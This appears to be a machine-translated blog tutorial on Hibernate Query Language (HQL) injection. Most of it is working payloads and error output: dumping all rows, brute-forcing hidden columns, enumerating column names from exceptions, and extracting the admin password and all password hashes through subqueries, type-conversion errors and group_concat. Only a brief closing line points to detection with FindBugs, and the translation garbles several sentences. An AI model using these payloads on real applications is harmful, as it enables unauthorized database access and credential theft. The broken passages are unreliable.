SQL injection is a very familiar way to attack, and there are a large number of DBMS (such as mysql,oracle,mssql, etc.) on the network that are injecting vulnerabilities. However, I can't find any resources on the network for the Hibernate query language. Therefore, this paper summarizes the author's experience and skills in the process of reading documents and constantly experimenting.
What is Hibernate
Hibernate is an ORM framework that maps the class definitions (code) associated with tables and includes advanced features, including caching and inheritance, typically used in Java and. NET (reference to NHibernate), but more popular in the Java ecosystem.
Query Language
First, the HQL query is not sent directly to the database, but is parsed and interpreted by the Hibernate engine and then converted to SQL. Why is this detail important? Because there are two sources of error messages, one from the hibernate engine and one from the database.
One of the great challenges of HQL is that the injection pattern is very limited, there is no union, no functions to create simple delays, no system functions, no available metadata tables, etc. The Hibernate query language does not have features that may exist in the background database.
Basis
The following sample code is used for subsequent tests. It is important to note that the malicious input is always between the percent sign:
Session.createquery ("from book where title like '%" + userinput + "% ' and published = True")
List all Entities
Here's a start from the basics: List all Books
From Bookwhere title like '% ' or 1=1 or ' = '% ' and published = True
To access hidden columns
Although the Union operator is not available, we can still brute-force the hidden columns.
From Bookwhere title like '% ' and promocode like ' A% ' or 1=2 and ' = '% ' and published = Truefrom Bookwhere tit Le like '% ' and promocode like ' B% ' or 1=2 and ' = '% ' and published = True
List all the columns
Perhaps some readers may ask, how do you find hidden columns/fields without a metadata table? I found a little trick, but only hibernate returns an exception message to the client when it is available. If the column name is not part of the entity definition in Hibernate, it will trigger an exception:
From Bookwhere title like '% ' and doesnt_exist=1 and ' = '% ' and published = True
To trigger an exception:
Org.hibernate.exception.SQLGrammarException:Column "doesnt_exist" not found; SQL Statement:select book0_.id as id21_, Book0_.author as author21_, Book0_.promocode as Promo3_21_, Book0_.title as Title 21_, book0_.published as published21_ from book book0_ where Book0_.title like '% ' or doesnt_exist= '% ' and book0_.publishe d=1 [42122-159]
With this exception, you can see the list name of the hibernate query.
Access to different tables
As mentioned earlier, HQL supports union queries and joins with other tables, but can only be used if the model explicitly defines a relationship. I find that the only way to access other tables is to use subqueries.
For example, the following query selects an item from the table that is associated with the "User" entity.
From Bookwhere title like '% ' and (select substring (password,1,1) from User where username= ' admin ') = ' a ' or ' ' = '% ' and published = True
Blind bets can then be made in the normal blind mode.
Non-blind note
Blind comparison fee time, if the exception message can be displayed, you can directly get any value. To do this, you need to convert a selected value to a different type. For example:
From Bookwhere title like '%11 ' and (select password from User where username= ' admin ') =1 or ' ' = '% ' and published = True
Hibernate then happily returns the exception message:
Data conversion Error converting "3f3ff0cdbfa0d515f8e3751e4ed98abe"; SQL Statement:select book0_.id as id18_, Book0_.author as Author18_, Book0_.promotioncode as Promotio3_18_, Book0_.title a S title18_, book0_.visible as visible18_ from book book0_ where Book0_.title like '%11 ' and (select User1_.password from U Ser user1_ where user1_.username = ' admin ') =1 or ' ' = '% ' and book0_.published=1 [22018-159]
Tip: Invoking a background function
As mentioned earlier, Hibernate hides some unrecognized column names in the Select and where statements, as well as on functions. The standard procedure for invoking a database function is to register the function mapping (hql->sql) (Java code) beforehand, but the attacker does not need to be concerned about compatibility. The complete function in the final query can be used to steal data (Group_concat,
Array_agg, ... ) or a simple fingerprint identification of the background database.
For example, if the database supports the GROUP_CONCAT function:
From Bookwhere title "%11" and (select CAST (group_concat (password) as String) from User) =1 or ' ' = '% ' and pub lished = True
The exception trigger is:
Data conversion Error Converting "3f3ff0cdbfa0d515f8e3751e4ed98abe,79a41d71c31128ffab81ac8df2069f9c, B7fe6f6a1024db6e56027aeb558f9e68 "; SQL Statement:select book0_.id as id18_, Book0_.author as author18_, Book0_.promotioncodeas promotio3_18_, Book0_.title a S title18_, book0_.visible as visible18_ from book book0_ where Book0_.title like '%11 ' and (select CAST (Group_concat (user 1_.password) as varchar (255)) from User user1_) =1 or ' ' = '% ' and book0_.published=1 [22018-159]
Summarize
This article is not about Hibernate, it's about exploiting HQL's skills. If a reader maintains a Java Web application that uses hibernate, you can run FindBugs and use these rules to identify potential injection issues related to the Hibernate API.
This is the end of this article, I hope you have some help readers!
Reference
Hql:the Hibernate Query language:hibernate official documentation
Hqlmap: Perhaps the only tool currently capable of automatic HQL injection (brute force entity and column name).
SQL injection Wiki: A useful reference for SQL injection on a variety of DBMS platforms.
Pentestmonkey
Another good reference for SQL injection cheatsheets:sql injection.
[Via H3xstream]
Hibernate HQL Injection Attack Primer